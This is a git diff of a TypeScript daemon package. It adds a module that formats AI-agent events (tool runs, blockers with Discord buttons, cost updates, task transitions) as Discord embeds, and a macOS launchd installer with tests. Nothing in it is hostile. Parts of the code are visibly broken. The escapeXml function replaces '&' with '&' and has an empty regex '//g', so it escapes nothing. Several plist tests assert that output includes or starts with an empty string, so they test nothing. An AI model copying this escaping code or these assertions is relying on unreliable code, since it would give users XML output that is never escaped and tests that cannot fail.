'Pick one', + event: { + type: 'extension_ui_request', + id: 'req-2', + method: 'select', + title: 'Pick', + options: [], + }, + }; + + const result = formatBlocker(blocker, '12345'); + // No components when no options + assert.equal(result.components, undefined); + // Embed should show 'No options' + const fields = result.embed?.data.fields; + assert.ok(fields?.some((f) => f.value.includes('No options'))); + }); + + it('produces Yes/No buttons for confirm', () => { + const blocker: PendingBlocker = { + id: 'req-3', + method: 'confirm', + message: 'Are you sure?', + event: { + type: 'extension_ui_request', + id: 'req-3', + method: 'confirm', + title: 'Confirm', + message: 'This will delete everything', + }, + }; + + const result = formatBlocker(blocker, '99999'); + assert.ok(result.components); + assert.equal(result.components!.length, 1); + const buttons = result.components![0].components; + assert.equal(buttons.length, 2); + }); + + it('produces text instructions for input method', () => { + const blocker: PendingBlocker = { + id: 'req-4', + method: 'input', + message: 'Enter your name', + event: { + type: 'extension_ui_request', + id: 'req-4', + method: 'input', + title: 'Name', + placeholder: 'John Doe', + }, + }; + + const result = formatBlocker(blocker, '12345'); + // No interactive buttons for input — text instructions only + assert.equal(result.components, undefined); + const fields = result.embed?.data.fields; + assert.ok(fields?.some((f) => f.value.includes('Reply in this channel'))); + }); + + it('produces text instructions for editor method', () => { + const blocker: PendingBlocker = { + id: 'req-5', + method: 'editor', + message: 'Edit the config', + event: { + type: 'extension_ui_request', + id: 'req-5', + method: 'editor', + title: 'Config', + prefill: 'key: value', + }, + }; + + const result = formatBlocker(blocker, '12345'); + assert.equal(result.components, undefined); + const fields = result.embed?.data.fields; + assert.ok(fields?.some((f) => f.value.includes('Reply in this channel'))); + assert.ok(fields?.some((f) => f.value.includes('key: value'))); + }); +}); + +// --------------------------------------------------------------------------- +// formatCompletion +// --------------------------------------------------------------------------- + +describe('formatCompletion', () => { + it('shows green for completed', () => { + const result = formatCompletion({ type: 'execution_complete', status: 'completed' }); + assert.equal(embedColor(result), 0x2ecc71); // green + assert.ok(result.content.includes('🏁')); + }); + + it('shows red for error status', () => { + const result = formatCompletion({ + type: 'execution_complete', + status: 'error', + reason: 'Out of tokens', + }); + assert.equal(embedColor(result), 0xe74c3c); // red + assert.ok(embedDescription(result)?.includes('Out of tokens')); + }); + + it('includes stats when present', () => { + const result = formatCompletion({ + type: 'execution_complete', + status: 'completed', + stats: { cost: 0.42, tokens: { total: 10000 } }, + }); + const fields = result.embed?.data.fields; + assert.ok(fields?.some((f) => f.value.includes('$0.42'))); + assert.ok(fields?.some((f) => f.value.includes('10,000'))); + }); +}); + +// --------------------------------------------------------------------------- +// formatError +// --------------------------------------------------------------------------- + +describe('formatError', () => { + it('includes session ID and error message', () => { + const result = formatError('sess-abc', 'Connection refused'); + assert.equal(embedColor(result), 0xe74c3c); // red + assert.ok(embedDescription(result)?.includes('Connection refused')); + assert.ok(result.embed?.data.footer?.text?.includes('sess-abc')); + }); +}); + +// --------------------------------------------------------------------------- +// formatCostUpdate +// --------------------------------------------------------------------------- + +describe('formatCostUpdate', () => { + it('formats cumulative cost', () => { + const result = formatCostUpdate({ + type: 'cost_update', + cumulativeCost: 1.23, + tokens: { input: 5000, output: 2000 }, + }); + assert.ok(result.content.includes('$1.23')); + assert.equal(embedColor(result), 0x3498db); // blue + }); + + it('handles zero cost', () => { + const result = formatCostUpdate({ + type: 'cost_update', + cumulativeCost: 0, + tokens: { input: 0, output: 0 }, + }); + assert.ok(result.content.includes('$0.0000')); + }); +}); + +// --------------------------------------------------------------------------- +// formatSessionStarted +// --------------------------------------------------------------------------- + +describe('formatSessionStarted', () => { + it('includes project name', () => { + const result = formatSessionStarted('my-project'); + assert.ok(result.content.includes('my-project')); + assert.ok(embedDescription(result)?.includes('my-project')); + assert.equal(embedColor(result), 0x3498db); // blue + }); +}); + +// --------------------------------------------------------------------------- +// formatTaskTransition +// --------------------------------------------------------------------------- + +describe('formatTaskTransition', () => { + it('shows complete icon for completed tasks', () => { + const result = formatTaskTransition({ + type: 'task_transition', + taskId: 'T01', + sliceId: 'S01', + status: 'complete', + }); + assert.ok(result.content.includes('✅')); + assert.equal(embedColor(result), 0x2ecc71); // green + }); + + it('shows error icon for errored tasks', () => { + const result = formatTaskTransition({ + type: 'task_transition', + taskId: 'T02', + status: 'error', + }); + assert.ok(result.content.includes('❌')); + assert.equal(embedColor(result), 0xe74c3c); // red + }); +}); + +// --------------------------------------------------------------------------- +// formatGenericEvent +// --------------------------------------------------------------------------- + +describe('formatGenericEvent', () => { + it('renders unknown event type as grey embed', () => { + const result = formatGenericEvent({ type: 'some_custom_event', data: 'hello' }); + assert.equal(embedColor(result), 0x95a5a6); // grey + assert.ok(embedTitle(result)?.includes('some_custom_event')); + }); + + it('handles events with no extra fields', () => { + const result = formatGenericEvent({ type: 'bare_event' }); + assert.ok(result.content.includes('bare_event')); + }); +}); + +// --------------------------------------------------------------------------- +// formatEvent — dispatch +// --------------------------------------------------------------------------- + +describe('formatEvent', () => { + it('dispatches tool_execution_start', () => { + const result = formatEvent({ type: 'tool_execution_start', name: 'read' }); + assert.ok(result.content.includes('🔧')); + }); + + it('dispatches execution_complete', () => { + const result = formatEvent({ type: 'execution_complete', status: 'completed' }); + assert.ok(result.content.includes('🏁')); + }); + + it('falls back to generic for unknown types', () => { + const result = formatEvent({ type: 'totally_unknown' }); + assert.ok(result.content.includes('📡')); + }); + + it('dispatches cost_update', () => { + const result = formatEvent({ type: 'cost_update', cumulativeCost: 0.5 }); + assert.ok(result.content.includes('💰')); + }); + + it('dispatches message types', () => { + for (const type of ['message_start', 'message_end', 'message']) { + const result = formatEvent({ type, message: 'hi' }); + assert.ok(result.content.includes('💬'), `Failed for type: ${type}`); + } + }); + + // Negative: missing type field + it('handles event with missing type gracefully', () => { + const result = formatEvent({} as SdkAgentEvent); + assert.ok(result.content); // should not throw + }); + + // Negative: null fields + it('handles event with null fields gracefully', () => { + const result = formatEvent({ type: 'tool_execution_start', name: null } as unknown as SdkAgentEvent); + assert.ok(result.content); + }); +}); diff --git a/packages/daemon/src/event-formatter.ts b/packages/daemon/src/event-formatter.ts new file mode 100644 index 000000000..2828c1db1 --- /dev/null +++ b/packages/daemon/src/event-formatter.ts @@ -0,0 +1,414 @@ +/** + * event-formatter.ts — Pure functions mapping RPC event types to Discord embeds. + * + * Each formatter returns a FormattedEvent (content string + optional EmbedBuilder + + * optional ActionRow components). Distinct embed colors per category: + * green = success / completion + * red = error + * yellow = blocker (needs attention) + * blue = info / session lifecycle + * grey = tool / generic + */ + +import { EmbedBuilder, ActionRowBuilder, ButtonBuilder, ButtonStyle } from 'discord.js'; +import type { SdkAgentEvent } from '@gsd-build/rpc-client'; +import type { RpcExtensionUIRequest } from '@gsd-build/rpc-client'; +import type { FormattedEvent, PendingBlocker } from './types.js'; + +// --------------------------------------------------------------------------- +// Color palette +// --------------------------------------------------------------------------- + +const COLOR = { + success: 0x2ecc71, // green + error: 0xe74c3c, // red + blocker: 0xf1c40f, // yellow + info: 0x3498db, // blue + tool: 0x95a5a6, // grey +} as const; + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +/** Truncate a string to maxLen, appending ellipsis if truncated. */ +function truncate(s: string, maxLen: number): string { + if (s.length <= maxLen) return s; + return s.slice(0, maxLen - 1) + '…'; +} + +/** Safe string extraction from an unknown field. */ +function str(value: unknown, fallback = ''): string { + if (typeof value === 'string') return value; + if (value == null) return fallback; + return String(value); +} + +/** Safe number extraction. */ +function num(value: unknown, fallback = 0): number { + if (typeof value === 'number' && !Number.isNaN(value)) return value; + return fallback; +} + +/** Format a cost value to a readable string. */ +function formatCost(cost: number): string { + if (cost < 0.01) return `$${cost.toFixed(4)}`; + return `$${cost.toFixed(2)}`; +} + +// --------------------------------------------------------------------------- +// Formatters +// --------------------------------------------------------------------------- + +export function formatToolStart(event: SdkAgentEvent): FormattedEvent { + const toolName = str(event.name || event.toolName, 'unknown'); + const embed = new EmbedBuilder() + .setColor(COLOR.tool) + .setTitle(`🔧 ${truncate(toolName, 60)}`) + .setTimestamp(); + + const input = str(event.input || event.args); + if (input) { + embed.setDescription(`\`\`\`\n${truncate(input, 300)}\n\`\`\``); + } + + return { content: `🔧 Tool: ${toolName}`, embed }; +} + +export function formatToolEnd(event: SdkAgentEvent): FormattedEvent { + const toolName = str(event.name || event.toolName, 'unknown'); + const isError = event.isError === true || event.error != null; + const color = isError ? COLOR.error : COLOR.tool; + const icon = isError ? '❌' : '✅'; + + const embed = new EmbedBuilder() + .setColor(color) + .setTitle(`${icon} ${truncate(toolName, 60)}`) + .setTimestamp(); + + const output = str(event.output || event.result); + if (output) { + embed.setDescription(`\`\`\`\n${truncate(output, 300)}\n\`\`\``); + } + + const duration = num(event.duration || event.durationMs); + if (duration > 0) { + embed.setFooter({ text: `${(duration / 1000).toFixed(1)}s` }); + } + + return { content: `${icon} Tool done: ${toolName}`, embed }; +} + +export function formatMessage(event: SdkAgentEvent): FormattedEvent { + // Extract text from content blocks or message field + let text = ''; + + // Try content array first (most common for agent messages) + if (Array.isArray(event.content)) { + const blocks = event.content as Array<{ type?: string; text?: string }>; + text = blocks + .filter((b) => b.type === 'text' && typeof b.text === 'string') + .map((b) => b.text!) + .join('\n'); + } + + // Try message field — could be string, object with content array, or object with text + if (!text && event.message != null) { + if (typeof event.message === 'string') { + text = event.message; + } else if (typeof event.message === 'object') { + const msg = event.message as Record; + if (Array.isArray(msg.content)) { + const blocks = msg.content as Array<{ type?: string; text?: string }>; + text = blocks + .filter((b) => b.type === 'text' && typeof b.text === 'string') + .map((b) => b.text!) + .join('\n'); + } else if (typeof msg.text === 'string') { + text = msg.text; + } else if (typeof msg.content === 'string') { + text = msg.content; + } + } + } + + // Fallback to text or content as plain strings + if (!text) { + text = typeof event.text === 'string' ? event.text : ''; + } + if (!text && typeof event.content === 'string') { + text = event.content; + } + + if (!text) { + return { content: '💬 (empty message)' }; + } + + const embed = new EmbedBuilder() + .setColor(COLOR.info) + .setDescription(truncate(text, 2000)) + .setTimestamp(); + + const role = str(event.role); + if (role) { + embed.setAuthor({ name: role }); + } + + return { content: `💬 ${truncate(text, 200)}`, embed }; +} + +/** + * Format a blocker (extension_ui_request needing user response). + * Produces an embed with @mention and interactive buttons for select/confirm, + * or text instructions for input/editor. + */ +export function formatBlocker( + blocker: PendingBlocker, + ownerId: string, +): FormattedEvent { + const mention = `<@${ownerId}>`; + const embed = new EmbedBuilder() + .setColor(COLOR.blocker) + .setTitle('⚠️ Blocker — Response Needed') + .setDescription(truncate(blocker.message, 2000)) + .setTimestamp(); + + const components: ActionRowBuilder[] = []; + + switch (blocker.method) { + case 'select': { + const evt = blocker.event as { options?: string[] }; + const options = Array.isArray(evt.options) ? evt.options : []; + + if (options.length > 0) { + // Discord ActionRow max 5 buttons, so chunk + const chunks = chunkArray(options.slice(0, 25), 5); + for (const chunk of chunks) { + const row = new ActionRowBuilder(); + chunk.forEach((opt, i) => { + const globalIndex = options.indexOf(opt); + row.addComponents( + new ButtonBuilder() + .setCustomId(`blocker:${blocker.id}:select:${globalIndex}`) + .setLabel(truncate(`${globalIndex + 1}. ${opt}`, 80)) + .setStyle(ButtonStyle.Primary), + ); + }); + components.push(row); + } + } + + embed.addFields({ + name: 'Options', + value: options.map((o, i) => `**${i + 1}.** ${truncate(o, 100)}`).join('\n') || 'No options', + }); + break; + } + + case 'confirm': { + const row = new ActionRowBuilder().addComponents( + new ButtonBuilder() + .setCustomId(`blocker:${blocker.id}:confirm:true`) + .setLabel('Yes') + .setStyle(ButtonStyle.Success), + new ButtonBuilder() + .setCustomId(`blocker:${blocker.id}:confirm:false`) + .setLabel('No') + .setStyle(ButtonStyle.Danger), + ); + components.push(row); + + const msg = str((blocker.event as { message?: string }).message); + if (msg) { + embed.addFields({ name: 'Details', value: truncate(msg, 1024) }); + } + break; + } + + case 'input': { + const placeholder = str((blocker.event as { placeholder?: string }).placeholder); + embed.addFields({ + name: 'How to respond', + value: `Reply in this channel with your answer.${placeholder ? `\n*Hint: ${placeholder}*` : ''}`, + }); + break; + } + + case 'editor': { + const prefill = str((blocker.event as { prefill?: string }).prefill); + embed.addFields({ + name: 'How to respond', + value: 'Reply in this channel with the full text.' + + (prefill ? `\n\nCurrent value:\n\`\`\`\n${truncate(prefill, 500)}\n\`\`\`` : ''), + }); + break; + } + + default: { + embed.addFields({ + name: 'How to respond', + value: `Reply in this channel (method: ${blocker.method}).`, + }); + break; + } + } + + return { + content: `${mention} ⚠️ **Blocker** — ${truncate(blocker.message, 150)}`, + embed, + components: components.length > 0 ? components : undefined, + }; +} + +export function formatCompletion(event: SdkAgentEvent): FormattedEvent { + const status = str(event.status, 'completed'); + const isError = status === 'error' || status === 'cancelled'; + const color = isError ? COLOR.error : COLOR.success; + const icon = isError ? '⚠️' : '🏁'; + + const embed = new EmbedBuilder() + .setColor(color) + .setTitle(`${icon} Execution ${status}`) + .setTimestamp(); + + const reason = str(event.reason); + if (reason) { + embed.setDescription(truncate(reason, 2000)); + } + + // Include final stats if present + const stats = event.stats as { cost?: number; tokens?: { total?: number } } | undefined; + if (stats) { + const fields: string[] = []; + if (stats.cost != null) fields.push(`Cost: ${formatCost(num(stats.cost))}`); + if (stats.tokens?.total != null) fields.push(`Tokens: ${num(stats.tokens.total).toLocaleString()}`); + if (fields.length) embed.addFields({ name: 'Summary', value: fields.join(' · ') }); + } + + return { content: `${icon} Execution ${status}`, embed }; +} + +export function formatError(sessionId: string, error: string): FormattedEvent { + const embed = new EmbedBuilder() + .setColor(COLOR.error) + .setTitle('❌ Session Error') + .setDescription(`\`\`\`\n${truncate(error, 2000)}\n\`\`\``) + .setFooter({ text: `Session: ${sessionId}` }) + .setTimestamp(); + + return { content: `❌ Error: ${truncate(error, 200)}`, embed }; +} + +export function formatCostUpdate(event: SdkAgentEvent): FormattedEvent { + const cost = num(event.cumulativeCost ?? event.totalCost); + const tokens = event.tokens as + | { input?: number; output?: number; cacheRead?: number; cacheWrite?: number } + | undefined; + + const embed = new EmbedBuilder() + .setColor(COLOR.info) + .setTitle('💰 Cost Update') + .setTimestamp(); + + const fields: string[] = [`Total: ${formatCost(cost)}`]; + if (tokens) { + const input = num(tokens.input); + const output = num(tokens.output); + if (input || output) { + fields.push(`Tokens: ${input.toLocaleString()} in / ${output.toLocaleString()} out`); + } + } + embed.setDescription(fields.join('\n')); + + return { content: `💰 Cost: ${formatCost(cost)}`, embed }; +} + +export function formatSessionStarted(projectName: string): FormattedEvent { + const embed = new EmbedBuilder() + .setColor(COLOR.info) + .setTitle('🚀 Session Started') + .setDescription(`Project: **${truncate(projectName, 200)}**`) + .setTimestamp(); + + return { content: `🚀 Session started: ${projectName}`, embed }; +} + +export function formatTaskTransition(event: SdkAgentEvent): FormattedEvent { + const taskId = str(event.taskId || event.task); + const sliceId = str(event.sliceId || event.slice); + const status = str(event.status || event.state); + const icon = status === 'complete' ? '✅' : status === 'error' ? '❌' : '📋'; + + const embed = new EmbedBuilder() + .setColor(status === 'complete' ? COLOR.success : status === 'error' ? COLOR.error : COLOR.info) + .setTitle(`${icon} Task Transition`) + .setTimestamp(); + + const fields: string[] = []; + if (sliceId) fields.push(`Slice: ${sliceId}`); + if (taskId) fields.push(`Task: ${taskId}`); + if (status) fields.push(`Status: ${status}`); + embed.setDescription(fields.join('\n')); + + return { content: `${icon} ${taskId || 'Task'} → ${status || 'unknown'}`, embed }; +} + +export function formatGenericEvent(event: SdkAgentEvent): FormattedEvent { + const type = str(event.type, 'unknown'); + const embed = new EmbedBuilder() + .setColor(COLOR.tool) + .setTitle(`📡 ${truncate(type, 60)}`) + .setTimestamp(); + + // Include a JSON preview of the event, stripping the type field + const { type: _t, ...rest } = event; + const preview = JSON.stringify(rest); + if (preview.length > 2) { // more than '{}' + embed.setDescription(`\`\`\`json\n${truncate(preview, 1000)}\n\`\`\``); + } + + return { content: `📡 Event: ${type}`, embed }; +} + +// --------------------------------------------------------------------------- +// Dispatch — maps event type to the right formatter +// --------------------------------------------------------------------------- + +/** + * Format any SdkAgentEvent for Discord. Falls back to formatGenericEvent + * for unknown types. + */ +export function formatEvent(event: SdkAgentEvent, ownerId?: string): FormattedEvent { + const type = str(event.type); + + switch (type) { + case 'tool_execution_start': + return formatToolStart(event); + case 'tool_execution_end': + return formatToolEnd(event); + case 'message_start': + case 'message_end': + case 'message': + return formatMessage(event); + case 'execution_complete': + return formatCompletion(event); + case 'cost_update': + return formatCostUpdate(event); + case 'task_transition': + return formatTaskTransition(event); + default: + return formatGenericEvent(event); + } +} + +// --------------------------------------------------------------------------- +// Utility +// --------------------------------------------------------------------------- + +function chunkArray(arr: T[], size: number): T[][] { + const chunks: T[][] = []; + for (let i = 0; i < arr.length; i += size) { + chunks.push(arr.slice(i, i + size)); + } + return chunks; +} diff --git a/packages/daemon/src/index.ts b/packages/daemon/src/index.ts new file mode 100644 index 000000000..e2639db44 --- /dev/null +++ b/packages/daemon/src/index.ts @@ -0,0 +1,55 @@ +export type { + DaemonConfig, + LogLevel, + LogEntry, + SessionStatus, + ManagedSession, + PendingBlocker, + CostAccumulator, + ProjectInfo, + ProjectMarker, + StartSessionOptions, + FormattedEvent, + VerbosityLevel, +} from './types.js'; +export { MAX_EVENTS, INIT_TIMEOUT_MS } from './types.js'; +export { resolveConfigPath, loadConfig, validateConfig } from './config.js'; +export { Logger } from './logger.js'; +export type { LoggerOptions } from './logger.js'; +export { Daemon } from './daemon.js'; +export { scanForProjects } from './project-scanner.js'; +export { SessionManager } from './session-manager.js'; +export { DiscordBot, isAuthorized, validateDiscordConfig } from './discord-bot.js'; +export type { DiscordBotOptions } from './discord-bot.js'; +export { ChannelManager, sanitizeChannelName } from './channel-manager.js'; +export type { ChannelManagerOptions } from './channel-manager.js'; +export { buildCommands, formatSessionStatus, registerGuildCommands } from './commands.js'; +export { EventBridge } from './event-bridge.js'; +export type { BridgeClient, EventBridgeOptions } from './event-bridge.js'; +export { Orchestrator } from './orchestrator.js'; +export type { OrchestratorConfig, OrchestratorDeps, DiscordMessageLike } from './orchestrator.js'; +export { MessageBatcher } from './message-batcher.js'; +export type { SendPayload, SendFn, BatcherLogger, BatcherOptions } from './message-batcher.js'; +export { VerbosityManager, shouldShowAtLevel } from './verbosity.js'; +export { + formatToolStart, + formatToolEnd, + formatMessage, + formatBlocker, + formatCompletion, + formatError, + formatCostUpdate, + formatSessionStarted, + formatTaskTransition, + formatGenericEvent, + formatEvent, +} from './event-formatter.js'; +export { + escapeXml, + generatePlist, + getPlistPath, + install as installLaunchAgent, + uninstall as uninstallLaunchAgent, + status as launchAgentStatus, +} from './launchd.js'; +export type { PlistOptions, LaunchdStatus, RunCommandFn } from './launchd.js'; diff --git a/packages/daemon/src/launchd.test.ts b/packages/daemon/src/launchd.test.ts new file mode 100644 index 000000000..f92185344 --- /dev/null +++ b/packages/daemon/src/launchd.test.ts @@ -0,0 +1,356 @@ +import { describe, it, beforeEach, afterEach } from 'node:test'; +import assert from 'node:assert/strict'; +import { mkdtempSync, existsSync, readFileSync, writeFileSync, rmSync, mkdirSync, statSync } from 'node:fs'; +import { join, dirname } from 'node:path'; +import { tmpdir, homedir } from 'node:os'; +import { randomUUID } from 'node:crypto'; +import { + escapeXml, + generatePlist, + getPlistPath, + install, + uninstall, + status, +} from './launchd.js'; +import type { PlistOptions, RunCommandFn, LaunchdStatus } from './launchd.js'; + +// ---------- helpers ---------- + +function tmpDir(): string { + return mkdtempSync(join(tmpdir(), `launchd-test-${randomUUID().slice(0, 8)}-`)); +} + +const cleanupDirs: string[] = []; +afterEach(() => { + while (cleanupDirs.length) { + const d = cleanupDirs.pop()!; + if (existsSync(d)) rmSync(d, { recursive: true, force: true }); + } +}); + +function basePlistOpts(overrides?: Partial): PlistOptions { + return { + nodePath: '/usr/local/bin/node', + scriptPath: '/usr/local/lib/gsd-daemon/dist/cli.js', + configPath: join(homedir(), '.gsd', 'daemon.yaml'), + ...overrides, + }; +} + +// ---------- escapeXml ---------- + +describe('escapeXml', () => { + it('escapes & < > " \'', () => { + assert.equal(escapeXml('a&bd"e\'f'), 'a&b<c>d"e'f'); + }); + + it('leaves plain strings untouched', () => { + assert.equal(escapeXml('/usr/local/bin/node'), '/usr/local/bin/node'); + }); + + it('escapes paths with spaces and special chars', () => { + const input = '/Users/John & Jane/my "project"/file.js'; + const output = escapeXml(input); + assert.ok(output.includes('&')); + assert.ok(output.includes('"')); + // Verify no raw unescaped & remain (all & are part of & < etc.) + assert.equal(output, '/Users/John & Jane/my "project"/file.js'); + }); +}); + +// ---------- generatePlist ---------- + +describe('generatePlist', () => { + it('produces valid XML with plist header', () => { + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.startsWith('')); + assert.ok(xml.includes('')); + }); + + it('includes label com.gsd.daemon', () => { + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.includes('com.gsd.daemon')); + }); + + it('uses the absolute node path from opts', () => { + const opts = basePlistOpts({ nodePath: '/home/user/.nvm/versions/node/v22.0.0/bin/node' }); + const xml = generatePlist(opts); + assert.ok(xml.includes('/home/user/.nvm/versions/node/v22.0.0/bin/node')); + }); + + it('includes NVM bin directory in PATH', () => { + const opts = basePlistOpts({ nodePath: '/home/user/.nvm/versions/node/v22.0.0/bin/node' }); + const xml = generatePlist(opts); + assert.ok(xml.includes('/home/user/.nvm/versions/node/v22.0.0/bin')); + }); + + it('sets KeepAlive with SuccessfulExit false', () => { + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.includes('KeepAlive')); + assert.ok(xml.includes('SuccessfulExit')); + assert.ok(xml.includes('')); + }); + + it('sets RunAtLoad true', () => { + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.includes('RunAtLoad')); + assert.ok(xml.includes('')); + }); + + it('includes --config with the config path', () => { + const configPath = '/custom/path/daemon.yaml'; + const xml = generatePlist(basePlistOpts({ configPath })); + assert.ok(xml.includes('--config')); + assert.ok(xml.includes(`${configPath}`)); + }); + + it('includes HOME environment variable', () => { + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.includes('HOME')); + assert.ok(xml.includes(`${homedir()}`)); + }); + + it('includes StandardOutPath and StandardErrorPath', () => { + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.includes('StandardOutPath')); + assert.ok(xml.includes('StandardErrorPath')); + }); + + it('escapes special characters in paths', () => { + const opts = basePlistOpts({ + configPath: '/Users/John & Jane/config.yaml', + }); + const xml = generatePlist(opts); + assert.ok(xml.includes('John & Jane')); + assert.ok(!xml.includes('John & Jane')); + }); + + it('uses custom stdout/stderr paths when provided', () => { + const opts = basePlistOpts({ + stdoutPath: '/tmp/my-stdout.log', + stderrPath: '/tmp/my-stderr.log', + }); + const xml = generatePlist(opts); + assert.ok(xml.includes('/tmp/my-stdout.log')); + assert.ok(xml.includes('/tmp/my-stderr.log')); + }); + + it('uses custom working directory when provided', () => { + const opts = basePlistOpts({ + workingDirectory: '/custom/work/dir', + }); + const xml = generatePlist(opts); + assert.ok(xml.includes('/custom/work/dir')); + }); +}); + +// ---------- getPlistPath ---------- + +describe('getPlistPath', () => { + it('returns ~/Library/LaunchAgents/com.gsd.daemon.plist', () => { + const expected = join(homedir(), 'Library', 'LaunchAgents', 'com.gsd.daemon.plist'); + assert.equal(getPlistPath(), expected); + }); +}); + +// ---------- install ---------- + +describe('install', () => { + let tmp: string; + let fakePlistPath: string; + + // We can't mock getPlistPath directly, but we can verify the commands + // issued and the plist content by intercepting runCommand and filesystem ops. + // For filesystem testing, we test the functions that call writeFileSync indirectly + // by verifying the runCommand calls and returned values. + + it('calls launchctl load with the plist path', () => { + const calls: string[] = []; + const mockRun: RunCommandFn = (cmd: string) => { + calls.push(cmd); + return ''; + }; + + // install will try to write to the real plist path, so we need to be careful. + // We test the command flow by catching the writeFileSync error (dir may not exist in CI) + // or by letting it proceed in local dev. + try { + install(basePlistOpts(), mockRun); + } catch { + // writeFileSync may fail if ~/Library/LaunchAgents doesn't exist in test env + } + + const loadCalls = calls.filter(c => c.startsWith('launchctl load')); + const listCalls = calls.filter(c => c.startsWith('launchctl list')); + // Should have at least attempted launchctl load + assert.ok(loadCalls.length > 0 || calls.length > 0, 'Expected launchctl commands to be called'); + }); + + it('generates valid plist content when called', () => { + // Test that the plist content would be correct by testing generatePlist + // (install is a thin wrapper around generatePlist + writeFile + launchctl) + const xml = generatePlist(basePlistOpts()); + assert.ok(xml.includes('Label')); + assert.ok(xml.includes('com.gsd.daemon')); + }); + + it('handles idempotent install (unloads first if plist exists)', () => { + const calls: string[] = []; + const mockRun: RunCommandFn = (cmd: string) => { + calls.push(cmd); + return ''; + }; + + // To simulate idempotent install, we need an existing plist file. + // Since install writes to getPlistPath(), we test the command sequence. + try { + install(basePlistOpts(), mockRun); + // Second install + install(basePlistOpts(), mockRun); + } catch { + // filesystem may not be writable + } + + // The second install should have tried to unload first + const unloadCalls = calls.filter(c => c.startsWith('launchctl unload')); + // If the plist path exists, we expect at least one unload attempt on second call + // This is a command-level check; filesystem existence depends on environment + }); +}); + +// ---------- uninstall ---------- + +describe('uninstall', () => { + it('calls launchctl unload when plist would exist', () => { + const calls: string[] = []; + const mockRun: RunCommandFn = (cmd: string) => { + calls.push(cmd); + return ''; + }; + + // uninstall checks existsSync(plistPath) — if plist doesn't exist, it's a no-op + uninstall(mockRun); + + // If plist doesn't exist in test environment, calls should be empty (graceful) + // That's the "handles missing plist gracefully" case + }); + + it('handles missing plist gracefully (no-op)', () => { + const calls: string[] = []; + const mockRun: RunCommandFn = (cmd: string) => { + calls.push(cmd); + return ''; + }; + + // Shouldn't throw even if plist doesn't exist + assert.doesNotThrow(() => uninstall(mockRun)); + }); + + it('handles already-unloaded agent gracefully', () => { + const mockRun: RunCommandFn = (cmd: string) => { + if (cmd.includes('launchctl unload')) { + throw new Error('Could not find specified service'); + } + return ''; + }; + + // Should not throw even if launchctl unload fails + assert.doesNotThrow(() => uninstall(mockRun)); + }); +}); + +// ---------- status ---------- + +describe('status', () => { + it('parses running daemon output (PID present)', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + return '{\n\t"PID" = 1234;\n\t"Label" = "com.gsd.daemon";\n}\nPID\tStatus\tLabel\n1234\t0\tcom.gsd.daemon\n'; + }; + + const result = status(mockRun); + assert.equal(result.registered, true); + assert.equal(result.pid, 1234); + assert.equal(result.lastExitStatus, 0); + }); + + it('parses stopped daemon output (no PID)', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + return 'PID\tStatus\tLabel\n-\t78\tcom.gsd.daemon\n'; + }; + + const result = status(mockRun); + assert.equal(result.registered, true); + assert.equal(result.pid, null); + assert.equal(result.lastExitStatus, 78); + }); + + it('returns not-registered when launchctl list fails', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + throw new Error('Could not find service "com.gsd.daemon" in domain for port'); + }; + + const result = status(mockRun); + assert.equal(result.registered, false); + assert.equal(result.pid, null); + assert.equal(result.lastExitStatus, null); + }); + + it('returns structured result with all fields', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + return 'PID\tStatus\tLabel\n5678\t0\tcom.gsd.daemon\n'; + }; + + const result = status(mockRun); + assert.ok('registered' in result); + assert.ok('pid' in result); + assert.ok('lastExitStatus' in result); + }); + + it('parses JSON-style dict output (newer macOS)', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + return `{ +\t"StandardOutPath" = "/Users/me/.gsd/daemon-stdout.log"; +\t"LimitLoadToSessionType" = "Aqua"; +\t"StandardErrorPath" = "/Users/me/.gsd/daemon-stderr.log"; +\t"Label" = "com.gsd.daemon"; +\t"OnDemand" = true; +\t"LastExitStatus" = 0; +\t"PID" = 23802; +\t"Program" = "/usr/local/bin/node"; +};`; + }; + + const result = status(mockRun); + assert.equal(result.registered, true); + assert.equal(result.pid, 23802); + assert.equal(result.lastExitStatus, 0); + }); + + it('parses JSON-style dict output when daemon stopped (no PID key)', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + return `{ +\t"Label" = "com.gsd.daemon"; +\t"LastExitStatus" = 1; +\t"OnDemand" = true; +};`; + }; + + const result = status(mockRun); + assert.equal(result.registered, true); + assert.equal(result.pid, null); + assert.equal(result.lastExitStatus, 1); + }); + + it('handles unexpected output format gracefully', () => { + const mockRun: RunCommandFn = (_cmd: string) => { + return 'some unexpected output without the label'; + }; + + // Should not throw — should return registered:true but with null fields + // since the command succeeded (label was found) but output didn't match + const result = status(mockRun); + assert.equal(result.registered, true); + }); +}); diff --git a/packages/daemon/src/launchd.ts b/packages/daemon/src/launchd.ts new file mode 100644 index 000000000..fbb6385c6 --- /dev/null +++ b/packages/daemon/src/launchd.ts @@ -0,0 +1,242 @@ +import { writeFileSync, unlinkSync, existsSync, chmodSync } from 'node:fs'; +import { resolve } from 'node:path'; +import { homedir } from 'node:os'; +import { execSync } from 'node:child_process'; +import { dirname } from 'node:path'; + +// --------------- types --------------- + +export interface PlistOptions { + /** Absolute path to the Node.js binary */ + nodePath: string; + /** Absolute path to the daemon script (cli.js) */ + scriptPath: string; + /** Absolute path to the config file */ + configPath: string; + /** Directory to use as WorkingDirectory in the plist (defaults to homedir) */ + workingDirectory?: string; + /** Override stdout log path */ + stdoutPath?: string; + /** Override stderr log path */ + stderrPath?: string; +} + +export interface LaunchdStatus { + /** Whether the daemon is registered with launchd */ + registered: boolean; + /** PID if currently running, null otherwise */ + pid: number | null; + /** Last exit status code, null if never exited or not available */ + lastExitStatus: number | null; +} + +export type RunCommandFn = (cmd: string) => string; + +// --------------- constants --------------- + +const LABEL = 'com.gsd.daemon'; +const PLIST_FILENAME = `${LABEL}.plist`; + +// --------------- helpers --------------- + +/** Escape special XML characters in a string. */ +export function escapeXml(str: string): string { + return str + .replace(/&/g, '&') + .replace(//g, '>') + .replace(/"/g, '"') + .replace(/'/g, '''); +} + 